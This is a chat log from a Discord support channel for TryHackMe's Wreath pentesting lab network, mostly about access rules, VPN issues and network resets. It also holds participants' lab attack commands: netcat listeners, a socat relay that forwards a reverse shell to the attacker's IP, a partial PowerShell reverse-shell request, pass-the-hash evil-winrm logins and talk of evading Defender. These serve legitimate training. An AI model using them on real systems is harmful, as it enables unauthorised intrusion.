#wreath-network
Hey, sorry if the question has already been asked. But can we start the Wreath network room ?
Hey, yes if you have a 7 day streak on THM
as its a soft release atm
Thx, It will be reset at the full release ? or just be upgraded ?
Soft release just means no announcements.
yeaah so progress carries on
^^^
Didn't know, thanks a lot !
Wreath is currently out under a soft release with a 7 day streak requirement for access (this may be subject to change prior to the hard release).
This means that you are free to join and complete the network (https://tryhackme.com/jr/wreath) as you wish.
We would ask that you keep this fairly quiet for the time being (i.e. please don't Tweet, stream or make any big announcements for now), as this is still just the soft-release; however, once the network is released properly, feel free to do as you wish with regards to publicity.
Any bugs or issues, please ping me in this chat.
Most of all -- enjoy!
Me too
I couldn't get a reverse connection though :/
Early this morning, scans were taking a lot of time, first 3 ports were
So you're getting three ports on box two?
open / filtered, then I spent some 20 mins with 14.37% progress on rest of the port
Yes
Yeah, nmap can be a little slow with it. I was noting that last night when testing it. Maybe try an alternative port scanner with it and see how that goes?
Okay, that's being very weird for different people. I see all four on the first instance of the network, but it doesn't seem to be replicating for the others. I'll switch the question around for it
Hi, every time I try to access wreath's room I get an alert from my AV and I can not access the room. Throwback's room worked great for me.
I do not have the option to upload a picture here unfortunately so I am attaching the alert.
"Today, 19/03/2021 15: 19: 17; Malicious object detected; Google Chrome; chrome.exe; C: \ Program Files (x86) \ Google \ Chrome \ Application \ chrome.exe; C: \ Program Files (x86 ) \ Google \ Chrome \ Application; 9028;; Active user; Detected; Detected; HEUR: Trojan.PowerShell.Generic; Trojan; High; Partially; https: //tryhackme.com/api/tasks/wreath ; wreath; https: //tryhackme.com/api/tasks; File; Expert analysis"
Thanks.
That's at your end I'm afraid. There's nothing dangerous about it -- you're the one making the request, after all
the main problem is, not getting a reverse connection :/ spent over 2 hours exhausting everything, silly me didn't recognize that the exploit works for UNIX then netcat isn't on Target machine, so only option was using bash. which failed successfully
I'd suggest setting up an exclusion
Which box is that for?
I did! it didn't work either
in fact, at times the exploit didn't work, but I kept repeating it
sometimes It worked, sometimes not,
Are you using a second VPN by any mischance?
sometimes, it didn't accept shell command as well
nope
OpenVPN, as suggested in instructions
As in, do you have any other VPNs connected? Nord/Proton/etc?
And is the VPN on your host machine, or in the VM?
nope, not at all
Thank you @merry robin for making this! I am cruising along the tasks breathing in the knowledge.
Interesting. Gimme a sec -- I'll confirm that it is working on the box here, then see if we can debug it for you
The pseudoshell uses perl because it's guaranteed to be installed -- worth giving that a try
Just getting my copy of the network active to have a look now
I hope, the automated one works well with script soon!
and I'll get it on perl, it will work definitely
Okay thank you.
There are suggestions how can I work around this error?
I would suggest adding TryHackMe as an exclusion in your antivirus
@vital hill that is definitely working here, so, let's debug
What OS are you using?
Linux Mint
Check your firewall
I was using THM Attack box though
The AttackBox should be fine with it
Hm -- which IP were you sending the shell back to?
that which is given when attackbox starts,
where its mentioned, that use this ip for reverse shells
Oh, I have an idea of what's happening there
When you started the attackbox
Did you manually start the VPN?
I first established the VPN, downloaded that file and did stuffs to operate it , with sudo perms
then started attackbox
So, you ran the VPN pack
yup
So, that's the problem
When the AttackBox starts it automatically establishes a VPN connection to the network
Meaning you ran the pack a second time, which always causes issues
Lemme just check that is actually mentioned
Yep -- last bit of Paragraph three there
I've just added a section in bold to make it clearer if you refresh the page?
Means I have not to do manually VPN connectivity ,
just launching attackbox works fine?
if yes, then that makes sense, I was skeptical, as if there are two instances
Yep
great room thanks Muiri.. please if i stop this time i can come back again after 2 hours ?
Yep, of course
Once you're in there are no limits
Still on the AB, with one VPN open?
And not connected from any other machine?
Show me ip a?
Oh, I should clarify actually -- if the network goes to sleep you will lose any reverse shells / proxies you have setup
But the files aren't deleted, and there are obviously no autogens
So the same SSH key will work and chisel will still be there, etc
Looks good to me. What's the first target IP for you?
10.200.81.200
Can you ping it / exploit it Ok?
yeah !
oh that what i want to know the id_rsa for ssh still works and i already have access
Type shell into the exploit and give it 10.50.82.4, with port 443
Then start netcat with sudo nc -lvnp 443 in the attackbox
Then press enter in the exploit
aight hold on
what?
It waits for you to start the listener before sending the shell
thank you it's well explained for every thing i will come back later ..
It tells you to press enter once you have a listener established
Thanks for all the amazing work
You're enjoying it?
Ayeeeee
will remember this!
Did you not press enter?
yuh!
Hehe, it happens, don't worry
followed your steps, and it worked
I'm curious how wreath differs from throwback, except the obvious things.
Guess I'll find out in about a week
But the resonance seems very positive and your "YOT*" were awesome
Have you not been able to start it yet?
Sure. It's gonna be a good laboratory for practice pivoting and av evasion
The big differences are in the content focus. Throwback is AD for a corporate network, Wreath is a lot smaller (for cost as much as anything else) and emulates a home network. It's designed to be a practice specifically for pivoting, messing around with empire, and having some fun with Windows Defender
Whereas Throwback obviously focussed on the AD attacks primarily
No, I'm currently learning more about RE and just doing some rooms now and then, so my streak runs out regularly
There may or may not be alternative methods to access it incoming
Given it's been approved and I know Ashu is working on it, I'm happy to say that (at least for now) subbed users will soon be able to get access without a streak.
I'm hesitant to say anything definitively because it's a soft-release and we're obviously still just playing around with what works from a balance perspective there
What if I don't finish it in the 9 days available ? Will i be able to take it back after ?
TL;DR -- once you join, it will remove you 10 days later; but you can rejoin without any requirements
Oh
Once you're in, that's you in -- you don't need a streak to get back in
ty !
That's purely because if you're in the room then you're assigned to a network -- even if you're finished with it
Being assigned to a network means costing money, so there's no point in that if you're not using it
Ok I understand better ty
for every x amount of users a new network is created. It use to be 5, that may have been bumped or reduced
Obviously it must stay profitable for the platform !
Especially with it being free -- it's not so much about the profit as meaning it's not running at too much of a loss
Rather a lot more for Wreath, so we're monitoring that too
Last question : We would ask that you keep this fairly quiet for the time being (i.e. please don't Tweet, stream or make any big announcements for now) Everyone has access to this discord-channel or ?
correct, no limitations other than potentially verified users
Yeah, everyone has access to it in here, but we haven't done any social media releases for it yet, or anything like that
There may potentially also be a competition for the hard-release as well
(Again, don't quote me on that though)
Dark released his walkthrough
But I guess I've the wrong kind of competition in mind, if there will be any competition
Yeah, that was going to be saved for the hard-release, but hey, it's just as good here
The competition wouldn't be over completing the actual network though
silly dorkus storkus
It'd be for something that's mentioned throughout the network, but isn't actually covered in the videos
You need a shave, my friend
Do I lose access to the wreath network if the 9 day counter runs out?
Nope, once your in, you can join it back
nice thanks!
long hair needs way too long to dry after washing
Can we stream Wreath Network on twitch?
Check pins
TL;DR: soon, but preferably not immediately
Once we've figured out exactly what's happening with the entry requirements and ironed out any little hitches, we'll release it properly with all the attached fanfare, etc
Until then it's kind of a case of keeping it vaguely on the down low though
time to spread the news
muha haha
also why isn't wreath underneath throwback in the discord?
Is it supposed to be in the support category?
Yeah, same as the Throwback support channel
There isn't a channel for people who have completed Wreath -- mainly because it's completely open anyway
Not that anyone discusses Throwback in that channel anyway
Probably been asked already, but if you pay for the premium sub, do you get instant access to the Wreath room without a 7 day streak?
Really? 🤦
yep
Wait do you not need a 7 day even if you have sub?
That's why Muir told me.
Oh never knew that
Oh, sweet, thanks James
Im a sub and still cant access the room for 6 more days lol
7 days makes me sad, have not been on thm for some time and now this, well maybe at some point in the future
That's something that is in the process of being added
Not sure if Ashu has got around to it yet
Muiri, it's been fun and informative this far (31/45).
has anyone completed the network so far?
Hey, wanted to check if the first machine is pingable for anyone?
i seem to be connected
but cant ping the machine
Yes
Should be
weird it isnt working for me
i will regenerate the vpn and check
yeaah idk if its just me
but even with regenerated connection pack it seems to not be reachable
Check your network is still active?
Muir is there gonna be some announcements for Wreath once it's "hard" released
so we can post on twitter etc.
i will check now, and try restarting my vm maybe it was conflicting with something
yeah seems to be giving me destination host unreachable error
i think its a bug, as i did a ping sweep and the IP is there just not the same as shown in the diagram
Yes, there will be
Wait, what IP is the diagram showing you and what IP exists?
10.200.81.200 and 10.200.81.250 respectively
ahh right, and just another quick question which I'm sure has been asked a million times today
if we lose the streak once we're in the room, will we have to restart to regain access
Nah, once you're in, you're in
The 10 day thing is just so that people aren't in the room (and thus forcing a network to stay active) for longer than they need to be
tried once and the start button is greyed out the Extend button is active
Strange. @limber rover could you check the activity of 10.200.81.200 if you get a sec? ๐
how many points is a user awarded completing the whole Wreath?
yeaah its strange as in the openvpn activity details page it says i am connected
yes i restarted the vm a couple times
i will check from attackbox maybe
I would suspect that someone has shut down 200, tbh
Hence asking for an activity check on it
Yeah the instance associated with that IP address is stopped
yeaah seems like it
not terminated -- but stopped
Could you restart it please CMN?
Is this intended? I am not able to access ||port 10000||
Wait, is the actual network down @fair breach?
Yes. What error is it giving you?
ahh got it, i tried clicking on that ec2 link and got confused
Don't think I can for the subnets wreath deploy on. But even then I think it'd get a bit funky on the frontend
*sigh* Ok, we need to implement auto restarts on those things.
Are you able to reset that network without the votes?
Shutdown at 17:50:01 shrugs I can't help out much more than that I'm afraid
Out of interest, what about 150 and 100?
Man for wreath network we need to regenerate our wreath network file again right
You should just be able to download it
Ok thank you man
They're both stopped. I can't force a network reset/restart
Ok, that sounds like the network has gone to sleep then, yes?
Sounds like it (:
Wonder if it's that extension thing again. Hm
@young roost if you're sure that the network is showing as alive, I'll try to get one of the admins to reset that instance without the votes
Extension thing? o.o
Otherwise, let it expire, then try to restart it
it says the network state : running
wreath is superior from what I hear
and the time for it to expire is 1h 24 m
If you clicked the extend button after the shutdown sequence initialised, it extended the timer but didn't restart the network.
Leading to exactly this situation.
probably thats what happened
I've asked for a reset. Worth trying to initiate one yourself though with the reset button
Failing that, just wait for it to expire then start it. That should fix
yess trying that, we have 4 resets out of 5
thaank youu
Ayeee. Nice one
wait
i had a 7 day streak before
but i cant access it
come on
seriously?
It goes off your current streak when you try to access it I'm afraid
Once you're in, you're in for good though
sigh so that means that i need to redo a streak for holo too
how long will the soft release last?
No idea on that one
ah ok i hope a week passes before because it looks like when it releases itll cost 20
Oh, that may just have not been updated. It was originally 10 days for holo, 20 for wreath. It then changed to 35 for wreath, and now 7
The short answer is: the admins are using the soft-release to figure out a good balance.
So we don't know what it will be, come the hard release
so if you get in the soft, then youre good even after it ends?
thats a pretty good deal
Pretty much, aye
well thanks in advance and ill join in a week
thanks for the awesome and long awaited room, looked at the tasks and wow it looks awesome
❤️
Good to hear! Enjoy it when you start! ♥️
hi
hey
thanks :)
Hi, sorry to msg again but wanted to confirm one thing its the hosts post compromising the machine
i think i have them but cant ping em
The what, sorry?
Yeah, they're both Windows, and one of them isn't actually accessible from 200
So neither of them will respond to pings anyway
ahh okay thanks a lot , just wanted to confirm
Np!

Turning down his offer of payment, you tell him: I'll do it!
Who refuse a payment offer ? 
Looking forward to these networks!!! I saw dark started posting on YouTube today
Awesome
Just Wreath for now. Enjoy!
@simple trail are you using the AttackBox, and did you start your VPN manually?
@merry robin Thanks. It was fun.
hm
(Streak limitation for subscribers only temporary)
Ayeeeee, nice one @solemn pendant!

I'm trying to use curl to transfer a file from my attack box. But getting timed out. I can ssh into the box - do we have a run ovpn on the attack box as well?
You may need a wreath network configuration file
@opal badge the AttackBox connects to the wreath network automatically.
Where are you trying to curl from, and did you run the connection pack manually?
Also, are you a subscriber?
yes subscriber
Where were you curling from? Box 1?
trying to curl from the 1st box which I have connected via ssh with rsa key
Ok. Could you show me ip a on the AttackBox?
i've just restarted the attack box - getting 10.10.173.144
Are you starting the OpenVPN manually?
when i tried that I could not ping the 1st box and when i connected via ssh had no response until i stopped vpn
Yes. It connects automatically, so connecting manually causes problems.
Ok, so, what is the curl command you're using?
curl http://10.10.173.144:8080/nmap-mattit4o -o /tmp/nmap-matti4o
Ah, there's the problem
As I've reset box I will have to redownload the files need again
It's not the same IP
Do ip a and look for a 10.50.x.x IP
That's the IP you need to use for the network
ok seen that on tun1
will try again thanks
Let me know how it goes
working thanks!
Wonderful
Muiri isn't joking. Bans from rooms are permanent, you will have to contact support.
if Muiri wants you to be unbanned.
There is literally no unban button. Unbans have to come straight from the top and are basically a case of manually editing the database.
Exactly ^
Just be glad it wasn't an admin who caught you in there. It's technically a breach of the computer misuse act (and most equivalents) because it was unauthorised access to a computer resource. Dark was outright deleting accounts for it.
I'm on the last question of Task 21 - trying to pass a hash instead of password, I get error - Error: An error of type HTTPClient::ConnectTimeoutError happened, message is execution expired
Error: Exiting with code 1
I get the same if i use the user i created but can connect via a password? Is there a bug in evil winrm 2.4?
Can you screenshot what you're doing @opal badge?
ok - spotted typo - entered wrong ip - need a coffee break as hacking for too long
Haha, fair enough!
Yeah, get some rest
Covfefe
:0 I managed to pivot with a socat relay. This is so cool!
sshuttle is my fav
I got totally stuck on proxy pivoting
If git-serv was not accessible to outside world how was dark able to rdp into it and use evil-winrm? I am not able to connect to git-serv using evil-winrm
But in the video he entered the git-serv's ip
yeah.
I got a powershell rev shell using pivot and created a new user to rdp/winrm into it
You still need to tunnel your traffic via the webserver
Or a different method of pivoting
Thanks for the help @strange bison
I'd recommend SShuttle over proxychains any day
got it gonna try sshuttle now
Just finished the network! Loved the network Muiri!! Will there be a role for this network too in THM discord?
He'll have been using sshuttle, yes
Also you guys should give certs if we submit a report!
Glad to hear you enjoyed it!
Probably not a role given it's free and we have so many roles that we literally break Discord already I'm afraid
Now that we can potentially arrange
There may also be some other stuff to do with reports incoming for the hard release as well
Yeah -- there are instructions in task 44. Style of a pentest report as a PDF on something like google docs where you can view it in browser, then just a link submitted as a writeup :)
cool!
I legit have my cherrytree document filled with tons of screenshots and files 🤣 !! Can't wait to write the report
Hehe, enjoy!
Will you accept writeup style writeups too?
Not for this one I'm afraid. I would have if there was a separate section for the reports, but in the end we decided it was just easiest to use the functionality that was already there.
Sad.
Wow finally made sshuttle to work, this is so awesome and easier to use than proxychains
I did say that in the network
does the access to the network is 10 days?
After 10 days it kicks you out, but you can immediately join again. It's just to make sure that you're never forcing a network to remain active unnecessarily
||pivot pivot pivot pivot ||
Pivot is goooood
btw for the write ups/reports do we skip over the tutorial task questions and treat it as a pen test or its good to include them
Converting python2 script into python3 sometimes takes a lot of time what's say @rustic shore
I think so most of the time parentheses works for the exploit
Maybe
i also use string formatting
Hmm that's nice
making it kinda clean
Truly clean
I did the Tony the tiger room in that only parentheses worked for the exploit.
i think it will also work
Maybe or we can convert it together and can post that in our own GitHub via collaboration
it worked it was easy
just brackets
Noice like it was similar in my case in Tony the tiger room
i think so
Now does it worked after adding brackets
yes
Cool
Treat it quite literally as a pentest report
Ignore the questions in the room -- just do it the way task 44 describes
Or a similar way, if you already have a report format that works for you -- there's no one correct way to do it
Thanks a lot , will do that i will try to do it as a pentest report then
Look forward to reading it!
I started my wreath vpn. Used that ip for shell as well
That'll be why then
It connects automatically when you're using the AttackBox
As in, you don't also need to connect manually
Again, blegh taking action that will break stuff without informing the user
It's in bold in the task!
I'll admit I haven't looked since I originally asked
OMG just wow and thanks to Muiri again !!! i learned yesterday socat for the first time and today i tried year of the fox by chance ..and guess what after upload linpeas ?? hahah no spoiler .. thanks again. just awesome
I do love socat
I'm using my kali
Hm, so what exactly is going wrong?
As in, what's happening and what are you trying to do?
i connect the wreath vpn on my kali. do the tasks. all normal until get a reverse shell
i enter the wreath ip. and the port tried either 4242 or 443, 53. none of them works
Can you screenshot?
the wreath network been reset. i changed the port to something random like4928. all works now, thank you !
Hi are we able to use nmap into the machine??? I mean we can upload nmap and use it??? Its allowed???
Yeah yeah i upload before the nc and socat with my username in tmp folder
Ok ok i see clearly now
Im just confused
Anything that can be clarified?
Its clear and well explained as i told you, thank you
im at task9 , love it so far
did someone ping?
#wreath-network Just completed Wreath Network - best weekends fun in a while. Thanks THM team
-undelete - a
Up to 10 last deleted messages (last hour or 12 hours for premium):
none...

Keep seeing unread messages in here, clicking then nothing new
so do I, and also on other rooms not only here
It's because people delete messages
Fyi @lusty imp -- not sure why it didn't let you undelete it
Someone messaged, I undeleted, then deleted the undelete 🤷
do i need to add the second ip i discovered to my hosts aswell to connect to the web server ?
Nah
strange, works with curl but i tried to access it on firefox
How did you pivot?
@surreal sail after 9 days you get removed from the network, but you don't lose progress, and can rejoin at any time without a streak
@surreal sail cost. Every user in the room is assigned to a network, which obviously costs a tonne to run. By removing people periodically we ensure that no one is in there who isn't actually working on it
Costs a lot to deliver a network for free
why im out i was working
What do you mean?
didnt get the window for credential
Screenshot it for me?
Interesting. That looks to be loading, but not showing you the page
What browser is that?
Either way, try a different browser?
Your proxy also looks to be off?
yes is off
should be on ??
and chisel must be running ??
then why the first web is ok
i mean 10.200.81.100
is work without proxy
Now that, I don't know. Did you have the proxy on when you loaded the page?
You'll always need at least chisel (or an alternative) to access .100 given it's protected from the outside network, and .200 can't access it
Np!
I'd much rather know about potential problems, than have people stay quiet about them
loving Wreath so far, (only up to task 21, trying to take good notes) - one thing I'm not sure on is I guess are there 'save spots' like I need to leave for now and might not be back for the day will things like an SSH key change ? I'm assuming my rce-username.php will probably disappear/be on another network later perhaps?
not that it was very time consuming to set up anyway
Wreath's really designed to be good for checkpoints
SSH keys / passwords won't change unless someone's being a twit
simultaneous upvotes
good to know, thank you
So yeah, you should see some nice checkpoints appear
I was really really pleased seeing how it was designed that way, I was testing on random evenings every few days
Thanks Muir, love all the awesome information on pivoting, I am really weak with that so I love the chance to learn it and practice it
Oh, to answer the question r/ the exploit.php
There's no clean up, so, if the network gets reset it will disappear, or if you get moved into a different network when you're kicked out (not sure there) then it will obviously be different
But otherwise it'll be there
yeah, np, given how easy that exploit is I don't think i'll have any trouble re-creating it as needed anyway if that does happen
The correct number of answer for open port is slightly less than the number of open ports nmap scan gave me. Is this normal? How else can I scan to get the accurate result? I've tried with SYN scan.
Which box?
Task 5 Enumeration
If it has anything to do with port 9050 on 10.200.81.200, or something along those lines, it's a listener we've got running with one of the Empire devs just now
There are two ports 9*** with one closed and the other open. So I guess the one that is open is the listener you are talking about.
Yeah -- apologies about that. Just ignore it -- it'll go away soon
That was really fun. Thanks to everyone who put work into that!
I am trying to open the port in firewall but it is showing ||"FirewallD is not running"||
I have trouble accessing 10.200.82.200...I already had necessary access last time, but now I get a "no route to host" error for SSH
Ignore that...10th time's the charm^^
Finished. Thanks again, I'm now a lot more comfortable tackling windows machines
That sounds like someone has been messing with that box. Try resetting it.
The streak limitation for subscribers got removed 🥳 or at least edited. I got in with a 5 day streak :)
Up to 10 last deleted messages (last hour or 12 hours for premium):
46 seconds ago (Mon Mar 22 11:31:55 2021) Cyb3ri0us#3578: Final release ??
Soon @ember solstice
Not quite yet, but this should be the final setting for the entry requirements.
ah ok, nice
Sorry if this was asked before, but i didn't find it. What happens after the "9 days of access left" expire? Can it be accessed again? considering i'm a subscriber.
It's in the top of task two, for reference
When you join a network, you're allocated into an instance of that network. These instances cost a tonne to run. Removing people periodically means that they aren't in the network when they're not actually using it, which means they aren't taking up a space in one of the instances (which would mean costing a lot of money in a free network unnecessarily).
You can rejoin at any time though, and your progress in the room isn't reset. You also shouldn't need a streak/sub to rejoin once you've been in there once.

Lez goooo
Upvote button upvote button
Yeah, Skidy added it in last night for me
idk how but im not asking questions
(Streak limitation only for non-subscribed users)
ahhhh
makes sense
also why do you have only 10 access days?
Np
Should probably pin that tbh
FAQ:
Why do I get kicked every ten days?
When you join a network, you're allocated into an instance of that network. These instances cost a tonne to run. Removing people periodically means that they aren't in the network when they're not actually using it, which means they aren't taking up a space in one of the instances (which would mean costing a lot of money in a free network unnecessarily).
You can rejoin at any time though, and your progress in the room isn't reset. You also shouldn't need a streak/sub to rejoin once you've been in there once; but you will need to redownload the VPN connection pack
nice
so basically i won't be able to access it after 9 days?
You'll still be able to join back
the machines dont respond to ping do they?
The first one definitely does
ah
because im connected to vpn and pings are getting lost; nmap is going nowhere
i had to add -Pn
The others do if you follow the tasks and do it from the first machine
Everything has to be pivoted through first machine
im still on the first one
am i doing something wrong
cant ping 10.200.72.200
Check task 9
Are you connected to the Network VPN or your normal one ? Just to make sure
Multiple vpns ?
no no
Well then sorry can't help since I haven't done the room yet
its ok
Yeah its gotta be VPN if you cant ping
Id double check
granted my ip is dif cuz im in a dif network
So you're on 72.x right?
weird
maybe im not
net_route_v4_add: 10.200.92.0/24 via 10.50.93.1
the display shows 72
@merry robin stuff broke
hmmm i think i know why
its because for some reason i got a wreath vpn generated before i started
and it might have been in 72.x
Leave, rejoin, and download a new pack
ya im doing that
You're in the dev network -- we ran out of new networks earlier, which meant it glitched a bit
That's still wrong
Leave the room, rejoin, regen and download?
Yeah, but you're in the dev network
Put simply -- too many people joined
ah
There were a certain number of networks requisitioned -- they all filled up
So the site started breaking the limit of people and sticking them back in the first network
Does it not auto scale?
It does -- to a fixed limit
huh
It was set to 10 instances. It's currently at 40
But obviously those will only come into play when they're needed -- that's just a maximum
also - is it normal that i got the first 3 ports right away but the 4th port takes a looong time
because i still havent gotten it
Aye. The first three are low down. The fourth is higher
thank
Feel free to use something like Rustscan if you want it faster though
Don't tell Bee
is this network beginner enough to start if I haven't made it through the whole offensive pentesting path? for context, I made it up to terminator, and have finished the whole complete beginner path
There is enough information in each task, and it goes step by step, to allow you to work through it with minimal background. HOWEVER, you'd be much better served if you got that foundational stuff first. Will help you figure out bumps along the way if you dont execute something correctly. However, it doesnt lose you anything if you wanted to jump in and try!
But James might not be as nice if you ask questions that might be more common sense if you had a better understanding of the foundational stuff. KIDDING.
Well, that's not very nice to poor James
uhh btw
for uploading ssh keys in the task 11
we do like <username>-key right?
and anywhere specific to upload it?
Why are you uploading SSH keys?
Because SSH keys make dreams
-warn @bronze shuttle Please be polite. Even if you're joking you should still consider that there's a measure of kindness even required with jokes, especially as this is a semi-professional environment. Additionally, community staff are volunteers so please be polite for that measure as well.
Warned the4rchangel#2830
I appreciated the humor, for what it's worth
this is probably not the right channel, but im curious: how does thm know when you've rooted a box?
You mean the lightning?
ya
Yeah -- it's essentially just me telling the admins which questions indicate you've broken it
Usually the password hash ones
makes sense
anyone else having trouble using sshuttle? im using the correct commands but can't seem to access the webpage of the internal target
Can you screenshot?
That's intended
Read the page
It let you connect -- the error is from the webserver, not your browser
thanks!
I took a break and came back after grabbing the ssh private key. I tested it at first and everything worked (from task 6). Came back and now I can not ssh into the machine. I also can not run the exploit to grab a new shell. I have re-downloaded my vpn key. Ping does not work and a port scan returns filtered... I'm kinda at a loss here at what I borked!
Website loads just fine though
Are you sure the network is alive?
What subnet are you on?
10.200.90.0/24 for the wreath, 10.50.91.14 is my tun0
@fair breach could you just check that 10.200.90.200 is alive please?
Try restarting your VPN?
aahhh i cant copy anything from xfreerdp with +clipboard flag on
Copying to your host or to Kali?
It is
@merry robin Yah and I even tried regenerating it and trying again
you need to like re-paste it and copy it or else it gives you this thing that crashes browsers
Logging in
It's stopped
Are the others in that network alive?
Stopped at 19:00:01 GMT
Everything on 10.200.90.* is stopped minus the vpn server
Well that would be why I can't connect! Thanks for looking into it!
Must be that bloody extension bug again
Call for a reset. If the network sleeps and you restart it then it should also fix, but you don't want to wait that long
And there's always gonna be some muppet that just presses extend for the giggles
it's at 3/5 votes, I'll work on other things till it resets... awesome content guys, I'm really loving it and can't wait to dive into the pivoting section
Pivoting into the pivoting section.
damn I missed a great chance at a pun
ahhhh empire's modules are sooo slow
i feel like im doing something wrong
oh wait
the agent isn't responding
uhhhhhh i cant get a responding agent D:
ohh wait
...nope
doesnt respond
i setup a hop thing
ahhhhh
firewall thing is open too
they initially connect but then they die
Yeah, there's a little bit of a problem with them just now -- I was working with the devs to fix it last night
They've got a fix for it, but I'm not sure if it's been pushed yet
Is it ok to stream Wreath THM network on Twitch?
Not until hard release
hmm, i can't get Invoke-Portscan loaded into memory
Get-Help could not find Invoke-Portscan in a help file in this session. To download updated help topics type: "Update-Help". To get help online, search for the help topic in the TechNet library at https:/go.microsoft.com/fwlink/?LinkID=107116.
At line:1 char:1
+ Get-Help Invoke-Portscan
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [Get-Help], HelpNotFoundException
+ FullyQualifiedErrorId : HelpNotFound,Microsoft.PowerShell.Commands.GetHelpCommand
Once it is announced on the social media networks.
using the -s argument, tried with sudo as well
@cyan vine when is the planned hard release
sudo evil-winrm -i SNIP -u SNIP -H SNIP -s /usr/share/powershell-empire/data/module_source/situational_awareness/network/
anything wrong with ^?
I have no idea :p
they're just not found 
oh wait
im dumb
lmao
brain fart forgot to init the script
it just seems like they fixed the streak and allow people to join it ahead of streak if you are subbed
@cyan vine
ye
So, that's an interesting question.
We're trying to avoid the same problem we had earlier with having too many people in the room and overflowing the requisitioned networks.
The room is currently half "full"
do you need me to leave it?
The Hard Release was planned for very soon, but it may need to be delayed a little so that some of the people in there are chucked out by the timer
network half empty, room half full
Given there are a bunch in there who have joined but aren't actually doing anything with it
Not if you're actively using it, no
One person won't really make a difference either way though
realized i could join and was going to start today
@merry robin just wanted to know if i could stream it
seems like a no so far
or no for now
Yeah, just until the hard release, although given that's been set, it's less of an issue.
Once it's out officially then feel free to go nuts with that kind of stuff
My pleasure!
waits for slow as heck evilwinrm to upload chisel
you could
wait
chisel windows zip contains something that doesnt have an extension
how am i supposed to run it?
there should be a precompiled version somewhere
unless you want to compile it yourself i guess
Guys, I am so dummy
I'm stuck, how can I set up a relay to forward a shell back to my local listener
set up relay on victim
./socat tcp-l:16888 tcp:MY_IP:9001
set up listener on attacker
nc -nvlp 9001
and make request a=powershell....('10.200.72.150,16888')....
huh
i think i got shit xD
lmao
i didn't use socat
You're currently sending it to itself
It needs to go to .200
Change the IP in the payload to 10.200.72.200
No idea there. Might be something to do with the fact you're one of about a hundred users in my dev network ๐
yeah
Or might be something in the payload. You shouldn't need to tell it to fork for that one iirc -- it's a constant connection
thanks man
appreciated !!
oh shoot this git download is sloooooow
Yeah -- might take a couple of minutes, that one
What does that mean?
9 days of access left

hmm, the ||/resources|| page is loading infinitely
it prompts me with basic auth fine, but just keeps loading
oh nvm
Yeahhh
Hey anyone having issue with the reverse shell in task 6 ?
What's wrong with it?
It's not connecting to my nc
I tried to connect it manually, it still didn't work.
Are you on the AttackBox?
nope on my local machine
What OS?
Kali
make sure it's your tun0 ip
Yeah i did
What IP did you use?
I am sure about that
Look at the second to last q there
okay 10.50..
Man something is wrong cause i have been for last half hour
Can you ping your own box?
yes i can
yes i can connect
okay i will do
curl failed to verify the legitimacy of the server and therefore could not
establish a secure connection to it. To learn more about this situation and
how to fix it, please visit the web page mentioned above.
i got the error
okay
549 users are in here, and it's not even hard released yet 
because it's good stuff
I didn't realise Duco was in there...
Don't worry, almost done
Hmmm
Does that mean you'll leave the server?
Or will you stick around for Holo?
I haven't decided yet, I'm getting scared by the mental scarring that's been caused to its testers
Haha, I don't think it's gonna be that bad. It's just pretty long, from what I gather
Also, scars are cool
<gender you are attracted to> totally dig scars

How far through Wreath are you?
but mental scars aren't visible
I'm about to get to the fun stuff. Task 36 rn
I only did a bit of the Empire stuff before Real Life came a-knocking
Empire didn't work for me, so gonna struggle with that later. Decided to run the .ps1 scripts through evil-winrm
empire didnt work for me either ):
Yeah I read it earlier, ran into the same issue as you. Agent pinged back at init, but then never replied to any given jobs
yeah i think it needs some fixing
There's a fix sitting in a branch of the private copy of Empire
I tested it last night -- it works. Just needs pushed
Any chance you could leave a message in pinned whenever that fix goes live?
private copy ):
Yep, will do
I'll also remove the note from the room
:)
thanks!
Gonna continue later on with AV Evasion. Really enjoying the content so far and looking forward to the last part
i just read the part about the cleanup script, that explains why when i popped into the shell an if statement randomly popped up and executed
lmao
An if statement?
Just ran into the same issue as this post.
Wouldn't it be worth the idea of escaping the embedded powershell code on the site in some form to avoid AV marking the room as malicious?
Or would that be too much effort and i should just go and add an exception rule for the site?
ya that deletes the service file
Problem with that is it would make the payload, uh, not work
It's an unfortunate part of learning to hack -- AV doesn't like it
It shouldn't
Do you have a screenshot?
That's running as a background process -- it's not attached to your session, so even if it was visible, you shouldn't be seeing it
Here's fine
That, uh, genuinely is the deletion script
yep
Did you copy it to your clipboard and paste it?
cmd.exe is autocompleting clear
ohhh
And echo isn't off
hmm
So it's trying to run the script
i didnt click enter doe
ahahahaha, thats hilarious
weird
You typed clear and clicked enter?
wait
lemme get my reverse shell back
and ill do the same thing
gimme a sec (i killed it)
This is what I get for hiding the bloody script in the PATH
Question is, can I be bothered moving it?
nope its not that
because uh
on the reverse shell
no tab auto-complete
just makes a space
What if you just type and run clear
No, it wouldn't be a shell autocomplete
oh thats it
It would be Windows filling in the most likely command
lmao
gg Muiri
*sigh*
so its me doing dumb move by doing clear on a windows box
Can I be bothered moving it?
Probably not
no
Btw, pretty sure you can use "cls" in order to actually clear the screen
Well no flippin' wonder that was happening
windows auto-executes bat files
Talk about idiocy smh
Thing is, that's gonna annoy the heck out of me now
Oh, I know
It's gonna annoy me that there's a bug in it
But fixing it is a lot of effort
Like, getting the admins to create a fresh dev network given there are about 100 people in dev network just now, messing with the security groups, or hacking the whole thing myself, then making the change, clearing up, cloning, then pushing to literally all of the 40 odd instances of the network
Nah, all good
100 people in dev? oof
haha
How many times has it crashed so far?
None, amazingly
We hit the max number of networks this morning. It was set to ten, so the site just started at the beginning and dumped everyone new into the dev network instead
nice
This is why we have soft releases
The max number is increased significantly now, for obvious reasons
FINALLY i got the rev shell
But there are still 100 people in my goddamn dev network
At least it goes to show you could probably compact networks even more in terms of how many ppl are put onto the same network.
Yeah, we genuinely could
ya
Because I reckon that even if everyone on the same network starts going ham, it should still hold up relatively well
That's how it was designed
woah the task tells me not to disable defender
The only bottleneck is at the end -- hence the cleanup
Yeah, because then no one else has any AV to practice against smh
No point in doing AV evasion if there's no AV